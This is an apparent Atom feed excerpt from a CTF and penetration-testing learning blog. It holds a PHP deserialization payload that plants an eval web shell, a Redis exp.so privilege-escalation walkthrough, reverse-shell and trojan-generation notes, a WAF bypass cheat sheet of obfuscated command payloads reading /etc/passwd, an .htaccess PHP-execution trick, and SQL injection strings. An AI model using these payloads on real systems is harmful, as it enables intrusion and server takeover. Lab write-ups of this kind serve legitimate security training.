O:1:"b":2:{s:1:"a";O:1:"a":1:{s:4:"code";s:10:"phpinfo();";}}</span><br><br><span class="hljs-comment"># final payload: O:1:"b":2:{s:1:"a";O:1:"a":1:{s:4:"code";s:21:"eval($_POST['pass']);";}}</span><br><br></code></pre></td></tr></table></figure><p>Connect with AntSword<br><img src="https://gitee.com/fogpost/photo/raw/master/202501091121732.png"><br><img src="https://gitee.com/fogpost/photo/raw/master/202501091120750.png"><br>Found that the permissions were insufficient, so tried the AntSword plugin to brute-force a bypass of<br>disable_functions (AntSword plugin)<br><img src="https://gitee.com/fogpost/photo/raw/master/202501091213124.png"></p><p>Also noticed a .swp file there, which is a leaked vim swap file; tried recovering it</p><blockquote><p>When a developer edits a text file with the vim editor, the system automatically creates a backup file; once editing is finished and the file is saved, the original is updated and the backup is deleted automatically.<br>However, when an editing session terminates unexpectedly, this backup file is left behind, and if the file is edited and aborted several times the backups are not overwritten but are saved in turn under other extensions such as swp, swo and swn.</p></blockquote><p>Recover it with vim: vim -r XXXX.php.swp<br><img src="https://gitee.com/fogpost/photo/raw/master/202501091224047.png"><br>Found the Redis configuration file here and tried connecting to it</p><p>This step needs the exp.so file to be downloaded and used; a brief explanation of the exp.so file</p><blockquote><p>In Redis, the exp.so file is commonly used as a way to escalate privileges through Redis. The file is a Redis module that can execute arbitrary code inside the Redis server.<br>Redis modules are pluggable extensions that let users add new functionality to the Redis server. exp.so is a Redis module that provides commands and functions allowing an attacker to execute arbitrary code inside the Redis server and thereby gain control of the machine.<br>In a Redis privilege escalation attack, the attacker usually exploits a Redis vulnerability or weak password to gain access to the Redis server. Once access is obtained, they can upload the exp.so file to the Redis server and load it with the Redis module load command. The file then executes arbitrary code inside the Redis server, giving the attacker control of the machine</p></blockquote><p>EXP.SO:<a href="https://github.com/Dliv3/redis-rogue-server">https://github.com/Dliv3/redis-rogue-server</a></p><p>Then escalate privileges through Redis<br><img src="https://gitee.com/fogpost/photo/raw/master/202501091255627.png"><br><img src="https://gitee.com/fogpost/photo/raw/master/202501091256738.png"><br>Pick any one and run the command; the file has to be loaded with the module load command before RCE is possible, so enter MODULE LOAD /var/www/html/exp.so in the virtual terminal<br>After that we can execute commands and read the flag<br><img src="https://gitee.com/fogpost/photo/raw/master/202501091257489.png"></p>]]></content>
<summary type="html"><h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>Introduction</h1><p>Ran into an unfamiliar bypass at the Great Wall Cup (长城杯) and could not beat it even going all out, so here I am training on it.</p>
<h2 id="天翼杯-2021-esay-eval"><a href</summary>
<category term="CTF" scheme="https://fogpost.top/categories/CTF/"/>
<category term="ctf" scheme="https://fogpost.top/tags/ctf/"/>
</entry>
<entry>
<title>nc: listening on a port and reverse shells</title>
<link href="https://fogpost.top/2025/01/05/nc%E7%9B%91%E5%90%AC%E7%AB%AF%E5%8F%A3%E5%92%8C%E5%8F%8D%E5%BC%B9shell/"/>
<id>https://fogpost.top/2025/01/05/nc%E7%9B%91%E5%90%AC%E7%AB%AF%E5%8F%A3%E5%92%8C%E5%8F%8D%E5%BC%B9shell/</id>
<published>2025-01-05T12:28:03.000Z</published>
<updated>2025-01-11T02:49:31.998Z</updated>
<content type="html"><![CDATA[<p>nc [-hlnruz] [-g<gateway…>] [-G<pointer count>] [-i<delay seconds>] [-o<output file>] [-p<port>] [-s<source address>] [-v…] [-w<timeout seconds>] [hostname] [port…]</p><p><img src="https://gitee.com/fogpost/photo/raw/master/202501052042662.png"></p><p>Note that when using nc -l, a successful connection produces no obvious output, but the connection may already be established at that point<br><img src="https://gitee.com/fogpost/photo/raw/master/202501052046913.png"><br><img src="https://gitee.com/fogpost/photo/raw/master/202501052047210.png"></p>]]></content>
<summary type="html"><p>nc [-hlnruz] [-g&lt;gateway…&gt;] [-G&lt;pointer count&gt;] [-i&lt;delay seconds&gt;] [-o&lt;output file&gt;] [-p&lt;port&gt;] [-s&lt;source address&gt;] [-v…] [-w&lt;timeout seconds&gt;]</summary>
<category term="WEB" scheme="https://fogpost.top/categories/WEB/"/>
<category term="web" scheme="https://fogpost.top/tags/web/"/>
</entry>
<entry>
<title>A simple remote-control trojan</title>
<link href="https://fogpost.top/2025/01/05/%E7%AE%80%E5%8D%95%E7%9A%84%E8%BF%9C%E6%8E%A7%E6%9C%A8%E9%A9%AC%E5%95%8A/"/>
<id>https://fogpost.top/2025/01/05/%E7%AE%80%E5%8D%95%E7%9A%84%E8%BF%9C%E6%8E%A7%E6%9C%A8%E9%A9%AC%E5%95%8A/</id>
<published>2025-01-05T12:19:19.000Z</published>
<updated>2025-01-11T02:50:03.167Z</updated>
<content type="html"><![CDATA[<h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>Introduction</h1><p>Playing with trojans</p><h2 id="利用kali生成"><a href="#利用kali生成" class="headerlink" title="利用kali生成"></a>Generating it with Kali</h2><p><img src="https://gitee.com/fogpost/photo/raw/master/202501052023460.png"></p><p>Parameter meanings: -p: payload (target OS type / architecture bit width / the kind of control obtained over the target / make the target connect back to the attacking machine); -f: format (file format); -o: output (output file)</p><p><img src="https://gitee.com/fogpost/photo/raw/master/202501052058694.png"><br>Configure the attack module</p>]]></content>
<summary type="html"><h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>Introduction</h1><p>Playing with trojans</p>
<h2 id="利用kali生成"><a href="#利用kali生成" class="headerlink" titl</summary>
<category term="渗透测试" scheme="https://fogpost.top/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"/>
<category term="web" scheme="https://fogpost.top/tags/web/"/>
</entry>
<entry>
<title>webtest</title>
<link href="https://fogpost.top/2025/01/05/webtest/"/>
<id>https://fogpost.top/2025/01/05/webtest/</id>
<published>2025-01-05T12:13:40.000Z</published>
<updated>2025-01-05T12:18:58.845Z</updated>
<content type="html"><![CDATA[<h1 id="JSFUCK"><a href="#JSFUCK" class="headerlink" title="JSFUCK"></a>JSFUCK</h1><figure class="highlight scheme"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs scheme">[][(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+([<span class="hljs-name">!</span>[]]+[][[]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]][([][(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+([<span class="hljs-name">!</span>[]]+[][[]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[][(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+([<span class="hljs-name">!</span>[]]+[][[]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]]+(<span 
class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+([][[]]+[])[<span class="hljs-name">+!+</span>[]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]+([][[]]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+([][(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+([<span class="hljs-name">!</span>[]]+[][[]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[][(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+([<span class="hljs-name">!</span>[]]+[][[]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]]+(<span 
class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]]((<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">+!+</span>[]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!</span>[]+[][(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+([<span class="hljs-name">!</span>[]]+[][[]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]])[<span class="hljs-name">!+</span>[]+!+[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+[<span class="hljs-name">+!+</span>[]]+(<span class="hljs-name">!!</span>[]+[][(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+([<span class="hljs-name">!</span>[]]+[][[]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span 
class="hljs-built_in">+</span></span>[]]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]])[<span class="hljs-name">!+</span>[]+!+[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]])()<br></code></pre></td></tr></table></figure><p>This snippet is alert(1); run it in the developer tools console.</p>]]></content>
<summary type="html"><h1 id="JSFUCK"><a href="#JSFUCK" class="headerlink" title="JSFUCK"></a>JSFUCK</h1><figure class="highlight scheme"><table><tr><td class="gu</summary>
</entry>
<entry>
<title>day01</title>
<link href="https://fogpost.top/2025/01/02/day01/"/>
<id>https://fogpost.top/2025/01/02/day01/</id>
<published>2025-01-02T12:59:16.000Z</published>
<updated>2025-01-02T13:00:06.000Z</updated>
<content type="html"><![CDATA[<h1 id="新刊blog,堂堂连载"><a href="#新刊blog,堂堂连载" class="headerlink" title="新刊blog,堂堂连载"></a>New blog, now serializing</h1>]]></content>
<summary type="html"><h1 id="新刊blog,堂堂连载"><a href="#新刊blog,堂堂连载" class="headerlink" title="新刊blog,堂堂连载"></a>New blog, now serializing</h1></summary>
</entry>
<entry>
<title>WAF bypass summary</title>
<link href="https://fogpost.top/2024/12/11/rce%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/"/>
<id>https://fogpost.top/2024/12/11/rce%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/</id>
<published>2024-12-11T07:39:59.000Z</published>
<updated>2025-01-11T02:46:15.332Z</updated>
<content type="html"><![CDATA[<h1 id="waf绕过总结"><a href="#waf绕过总结" class="headerlink" title="waf绕过总结"></a>WAF bypass summary</h1><h2 id="ping"><a href="#ping" class="headerlink" title="ping"></a>ping</h2><p>In a ping feature, some places allow appending ; or | after the argument to execute commands directly, but this runs into a WAF that blocks such input, and we need to get past it</p><h2 id="空格绕过:"><a href="#空格绕过:" class="headerlink" title="空格绕过:"></a>Space bypass:</h2><p>Under bash you can use $IFS, ${IFS}, $IFS$9, %09, <, >, <>, {,} (for example {cat,/etc/passwd}), %20 (space), %09 (tab)</p><h2 id="命令执行函数system-绕过"><a href="#命令执行函数system-绕过" class="headerlink" title="命令执行函数system()绕过"></a>Command execution function system() bypass</h2><p>The system command functions system(), passthru(), exec(), shell_exec(), popen(), proc_open(), pcntl_exec() and backticks (`), which behave like shell_exec(): any of the above can be used to bypass a filter on one of them.</p><h2 id="命令链接符:"><a href="#命令链接符:" class="headerlink" title="命令链接符:"></a>Command connectors:</h2><p>Command connectors supported on both Windows and Linux:<br>cmd1 | cmd2 only executes cmd2<br>cmd1 || cmd2 cmd2 is executed only after cmd1 fails<br>cmd1 & cmd2 executes cmd1 first, then cmd2 regardless of whether cmd1 succeeded<br>cmd1 && cmd2 executes cmd1 first, and cmd2 only if cmd1 succeeded, otherwise cmd2 is not run<br>Linux also supports the semicolon (;): cmd1;cmd2 runs them in order, cmd1 first and then cmd2 </p><h2 id="正则匹配绕过"><a href="#正则匹配绕过" class="headerlink" title="正则匹配绕过"></a>Regex matching bypass</h2><h3 id="双写绕过"><a href="#双写绕过" class="headerlink" title="双写绕过"></a>Double-writing bypass</h3><p>An ordinary regex replacement only matches once, so we can bypass it by doubling the keyword: in pphphp only the middle php is stripped, and the remaining parts join to form a second php; phpphpinfoinfo works the same way.</p><h3 id="利用变量绕过"><a href="#利用变量绕过" class="headerlink" title="利用变量绕过"></a>Bypass using variables</h3><p>a=c;b=a;c=t;<br>$a$b$c /etc/passwd</p><h3 id="利用base编码绕过"><a href="#利用base编码绕过" class="headerlink" title="利用base编码绕过"></a>Bypass using base64 encoding</h3><p>echo 'cat' | base64<br>Y2F0wqAK<br>`echo 'Y2F0wqAK' | base64 -d` /etc/passwd<br>echo 'Y2F0IC9ldGMvcGFzc3dk' | base64 -d | bash // cat /etc/passwd </p><h3 id="利用hex编码绕过"><a href="#利用hex编码绕过" class="headerlink" title="利用hex编码绕过"></a>Bypass using hex encoding</h3><p>echo "636174202F6574632F706173737764" | xxd -r -p|bash // the 0x prefix is not entered for the hex encoding</p><h3 id="利用oct编码(八进制)绕过"><a href="#利用oct编码(八进制)绕过" class="headerlink" title="利用oct编码(八进制)绕过"></a>Bypass using oct (octal) encoding</h3><p>$(printf "\154\163") // the ls command</p><h3 id="利用16进制编码绕过"><a href="#利用16进制编码绕过" class="headerlink" title="利用16进制编码绕过"></a>Bypass using hexadecimal escapes</h3><p>"\x73\x79\x73\x74\x65\x6d"("cat /etc/passwd")</p><h3 id="利用拼接绕过"><a href="#利用拼接绕过" class="headerlink" title="利用拼接绕过"></a>Bypass using concatenation</h3><p>(sy.(st).em)(whoami);//<br>c''a''t /etc/passwd // single quotes<br>c""a""t /etc/passwd // double quotes<br>c`a`t /etc/passwd // backticks<br>c\a\t /etc/passwd // backslashes<br>$* and $@, $x (x stands for 1-9), ${x} (x>=10):<br>for example ca${21}t a.txt means cat a.txt; when no arguments are passed, these special parameters default to empty, as follows:<br>wh$1oami<br>who$@ami<br>whoa$*mi<br>666`whoami`666 //bash: 666root666: command not found<br>666`\whoami`666 //bash: 666root666: command not found<br>//the result of the executed command sits between the two 666s </p><h3 id="插入注释"><a href="#插入注释" class="headerlink" title="插入注释"></a>Inserting comments</h3><p>(useful for getting past WAF rule sets that block specific PHP function names)<br>system/*A10ng_*/(whoami);<br>system/*A10ng_*/(wh./*A10ng_*/(oa)/*caixukun*/.mi);<br>(sy./*A10ng_*/(st)/*A10ng_*/.em)/*A10ng_*/(wh./*A10ng_*/(oa)/*A10ng_*/.mi);</p><h3 id="利用未初始化变量"><a href="#利用未初始化变量" class="headerlink" title="利用未初始化变量"></a>Using uninitialized variables</h3><p>cat$u /etc/passwd<br>cat /etc$u/passwd</p><h3 id="过滤了斜杠’-‘"><a href="#过滤了斜杠’-‘" class="headerlink" title="过滤了斜杠’/‘"></a>When the slash '/' is filtered</h3><p>Commands can be chained with ';' to get around it<br>cd ..;cd ..;cd ..;cd ..;cd etc;cat passwd</p><h3 id="利用通配符绕过"><a href="#利用通配符绕过" class="headerlink" title="利用通配符绕过"></a>Bypass using wildcards</h3><p>cat /etc/passwd:<br>??? /e??/?a????</p><h3 id="利用path绕过"><a href="#利用path绕过" class="headerlink" title="利用path绕过"></a>Bypass using PATH</h3><p>Substrings of PATH can be sliced out and concatenated to build the command we want and get a shell<br>${PATH:5:1} //l<br>${PATH:2:1} //s<br>${PATH:5:1}${PATH:2:1} //concatenates to ls and executes the command<br>${PATH:5:1}s //concatenates to ls and executes the command </p><h3 id="异或绕过"><a href="#异或绕过" class="headerlink" title="异或绕过"></a>XOR bypass</h3><figure class="highlight py"><table><tr><td class="code"><pre><code class="hljs py"><span class="hljs-comment"># print every XOR pair in the 7-bit ASCII range so the pair producing a wanted character can be looked up</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">xor</span>():<br> <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">0</span>,<span class="hljs-number">128</span>):<br> <span class="hljs-keyword">for</span> j <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">0</span>,<span class="hljs-number">128</span>):<br> result=i^j<br> <span class="hljs-built_in">print</span>(<span class="hljs-built_in">chr</span>(i)+<span class="hljs-string">' ^ '</span>+<span class="hljs-built_in">chr</span>(j)+<span class="hljs-string">' == > '</span>+<span class="hljs-built_in">chr</span>(result)+<span class="hljs-string">" ASCII:"</span>+<span class="hljs-built_in">str</span>(result))<br><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">"__main__"</span>:<br> xor()<br></code></pre></td></tr></table></figure><p>('GGGGGGG'^'7/7.)!(')();<br>where 'G'^'7' = p, 'G'^'/' = h, and so on, piecing together the command you want.</p><h3 id="取反绕过"><a href="#取反绕过" class="headerlink" title="取反绕过"></a>Bitwise-NOT bypass</h3><p>A word on negation here: the reasons for it are hiding the letters, reversibility, and compatibility with URL encoding and binary data.<br>Negation is a concealment technique that turns sensitive characters into a hard-to-recognize form and evades detection effectively, whereas leaving them un-negated exposes the sensitive characters directly or makes them easier to decode and detect. Combined with methods such as urlencode(), bitwise negation raises the complexity of the bypass and improves concealment</p><figure class="highlight php"><table><tr><td class="code"><pre><code class="hljs php"><span class="hljs-meta"><?php</span><br><span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">urlencode</span>(~<span class="hljs-string">'phpinfo'</span>);<br><span class="hljs-meta">?></span><br></code></pre></td></tr></table></figure><p>For example phpinfo() becomes:<br>(~'%8F%97%8F%96%91%99%90')();</p><figure class="highlight php"><table><tr><td class="code"><pre><code class="hljs php"><span class="hljs-meta"><?php</span><br><span class="hljs-variable">$a</span> = <span class="hljs-string">"system"</span>;<br><span class="hljs-variable">$b</span> = <span class="hljs-string">"ls /"</span>;<br><span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">urlencode</span>(~<span class="hljs-variable">$a</span>); <span class="hljs-comment">// ~$a applies a bitwise NOT</span><br><span class="hljs-keyword">print</span>(<span class="hljs-string">"\n"</span>);<br><span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">urlencode</span>(~<span class="hljs-variable">$b</span>); <span class="hljs-comment">// ~$b applies a bitwise NOT</span><br><span class="hljs-meta">?></span><br>payload=?wllm=(~%8c%86%8c%8b%9a%92)(~%9C%9E%8B%DF%D0%99%D5);<br></code></pre></td></tr></table></figure><h2 id="htaccess文件包含绕过"><a href="#htaccess文件包含绕过" class="headerlink" title=".htaccess文件包含绕过"></a>.htaccess file-inclusion bypass</h2><figure class="highlight js"><table><tr><td class="code"><pre><code class="hljs js"><span class="hljs-comment"># only matches 1.jpg; it can also be applied to all files, parsing them as PHP</span><br><<span class="hljs-title class_">FilesMatch</span> <span class="hljs-string">"1.jpg"</span>><br><span class="hljs-title class_">SetHandler</span> application/x-httpd-php<br></<span class="hljs-title class_">FilesMatch</span>><br></code></pre></td></tr></table></figure>]]></content>
<summary type="html"><h1 id="waf绕过总结"><a href="#waf绕过总结" class="headerlink" title="waf绕过总结"></a>WAF bypass summary</h1><h2 id="ping"><a href="#ping" class="headerlink" titl</summary>
<category term="网络" scheme="https://fogpost.top/categories/%E7%BD%91%E7%BB%9C/"/>
<category term="web" scheme="https://fogpost.top/tags/web/"/>
</entry>
<entry>
<title>Jelly: executable XML files in web applications</title>
<link href="https://fogpost.top/2024/12/11/web%E4%B8%AD%E5%8F%AF%E6%89%A7%E8%A1%8C%E7%9A%84xml%E6%96%87%E4%BB%B6jelly/"/>
<id>https://fogpost.top/2024/12/11/web%E4%B8%AD%E5%8F%AF%E6%89%A7%E8%A1%8C%E7%9A%84xml%E6%96%87%E4%BB%B6jelly/</id>
<published>2024-12-11T06:03:29.000Z</published>
<updated>2024-12-11T06:21:06.424Z</updated>
<content type="html"><![CDATA[<h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>Introduction</h1><p>It has been a while since I wrote anything. A recent CTF had a Jelly challenge, a web problem from the Guocheng Cup (国成杯), so here is a note on it; the challenge description is as follows:</p><h2 id="Jelly简介"><a href="#Jelly简介" class="headerlink" title="Jelly简介"></a>About Jelly</h2><p><a href="https://commons.apache.org/proper/commons-jelly/">Official introduction to Jelly</a></p><p>Jelly is short for Java Server Pages XML; it is an XML-based scripting language for generating dynamic content in Java EE applications. Being XML-based, it lets developers write Java code using XML markup in order to generate dynamic content.</p><p>Jelly scripts are usually embedded in JSP files, where special XML markup is used to execute Java code. These markup elements, called Jelly tags, can execute Java code, access Java objects, handle requests and responses, and so on.</p><h2 id="如何实现并工作的"><a href="#如何实现并工作的" class="headerlink" title="如何实现并工作的"></a>How it is implemented and works</h2><figure class="highlight xml"><table><tr><td class="code"><pre><code class="hljs xml"><span class="hljs-tag"><<span class="hljs-name">document</span> <span class="hljs-attr">time</span>=<span class="hljs-string">"${now}"</span>></span><br> Welcome ${user.name} to Jelly!<br><span class="hljs-tag"></<span class="hljs-name">document</span>></span><br></code></pre></td></tr></table></figure><p>The original script</p><figure class="highlight java"><table><tr><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">MyTask</span> {<br><br> <span class="hljs-comment">// backing fields for the two properties set below</span><br> <span class="hljs-keyword">private</span> <span class="hljs-type">int</span> x;<br> <span class="hljs-keyword">private</span> String y;<br><br> <span class="hljs-comment">// 'doIt' method that does some function/task...</span><br> <span class="hljs-keyword">public</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">run</span><span class="hljs-params">()</span> <span class="hljs-keyword">throws</span> Exception {<br> <span class="hljs-comment">// do something...</span><br> }<br><br> <span class="hljs-comment">// Properties, can be any type</span><br> <span class="hljs-keyword">public</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">setX</span><span class="hljs-params">(<span class="hljs-type">int</span> x)</span> {<br> <span class="hljs-built_in">this</span>.x = x;<br> }<br> <span class="hljs-keyword">public</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">setY</span><span class="hljs-params">(String y)</span> {<br> <span class="hljs-built_in">this</span>.y = y;<br> }<br>}<br></code></pre></td></tr></table></figure><p>The Jelly file that invokes the script</p><figure class="highlight xml"><table><tr><td class="code"><pre><code class="hljs xml"><span class="hljs-tag"><<span class="hljs-name">j:jelly</span> <span class="hljs-attr">xmlns:j</span>=<span class="hljs-string">"jelly:core"</span> <span class="hljs-attr">xmlns:define</span>=<span class="hljs-string">"jelly:define"</span> <span class="hljs-attr">xmlns:my</span>=<span class="hljs-string">"myTagLib"</span>></span><br><br> <span class="hljs-tag"><<span class="hljs-name">define:taglib</span> <span class="hljs-attr">uri</span>=<span class="hljs-string">"myTagLib"</span>></span><br> <span class="hljs-tag"><<span class="hljs-name">define:jellybean</span> <span class="hljs-attr">name</span>=<span class="hljs-string">"foo"</span> <span class="hljs-attr">className</span>=<span class="hljs-string">"MyTask"</span>/></span><br> <span class="hljs-tag"></<span class="hljs-name">define:taglib</span>></span><br><br> Now lets use the new tag<br> <br> <span class="hljs-tag"><<span class="hljs-name">my:foo</span> <span class="hljs-attr">x</span>=<span class="hljs-string">"2"</span> <span class="hljs-attr">y</span>=<span class="hljs-string">"cheese"</span>/></span><br><br><span class="hljs-tag"></<span class="hljs-name">j:jelly</span>></span><br></code></pre></td></tr></table></figure><h2 id="继承功能"><a href="#继承功能" class="headerlink" title="继承功能"></a>Inherited capabilities</h2><p>Jelly builds on JSTL, Ant, XML, Web Services and others, so it can carry out a wide range of functions</p>]]></content>
<summary type="html"><h1 id="简介"><a href="#简介" class="headerlink" title="Introduction"></a>Introduction</h1><p>It has been a while since I wrote anything. I ran into a Jelly challenge in a recent CTF, so here are my notes. It was a web challenge from the 国成杯 CTF; the challenge description is as follows:</p>
</summary>
<category term="Network" scheme="https://fogpost.top/categories/%E7%BD%91%E7%BB%9C/"/>
<category term="web" scheme="https://fogpost.top/tags/web/"/>
</entry>
<entry>
<title>sqli10-20</title>
<link href="https://fogpost.top/2024/12/09/sqli10-20/"/>
<id>https://fogpost.top/2024/12/09/sqli10-20/</id>
<published>2024-12-09T11:45:38.000Z</published>
<updated>2025-01-11T02:40:33.275Z</updated>
<content type="html"><![CDATA[<h1 id="sqli11-20"><a href="#sqli11-20" class="headerlink" title="sqli11-20"></a>sqli11-20</h1><h2 id="11"><a href="#11" class="headerlink" title="11"></a>11</h2><p>Entering 1' produces an error message, so injection is present<br><img src="https://gitee.com/fogpost/photo/raw/master/202412091947957.png"><br>Constructing 1' or 1=1 # succeeds, and 1' union select 1,2# injects successfully, the same as sqli1<br><img src="https://gitee.com/fogpost/photo/raw/master/202412091949999.png"></p><h2 id="12"><a href="#12" class="headerlink" title="12"></a>12</h2><p>This is string injection with double quotes; the payloads are as follows</p><blockquote><p>1") or 1=1<br>1") union select 1,2#</p></blockquote><h2 id="13-14"><a href="#13-14" class="headerlink" title="13, 14"></a>13, 14</h2><p>Same as above; the only difference is the quote character and the parentheses</p><h2 id="15"><a href="#15" class="headerlink" title="15"></a>15</h2><p>Same as 11, but boolean blind injection</p><h2 id="16"><a href="#16" class="headerlink" title="16"></a>16</h2><p>Same as 12, but boolean blind injection</p><h2 id="17"><a href="#17" class="headerlink" title="17"></a>17</h2><p>Key point: three kinds of error-based injection<br>extractvalue() error-based injection, updatexml() error-based injection and group by() error-based injection<br>Principle</p>]]></content>
<summary type="html"><h1 id="sqli11-20"><a href="#sqli11-20" class="headerlink" title="sqli11-20"></a>sqli11-20</h1></summary>
<category term="SQL" scheme="https://fogpost.top/categories/SQL/"/>
<category term="sql" scheme="https://fogpost.top/tags/sql/"/>
</entry>
<entry>
<title>DC-2</title>
<link href="https://fogpost.top/2024/11/28/DC-2/"/>
<id>https://fogpost.top/2024/11/28/DC-2/</id>
<published>2024-11-28T14:46:20.000Z</published>
<updated>2025-01-11T02:39:52.313Z</updated>
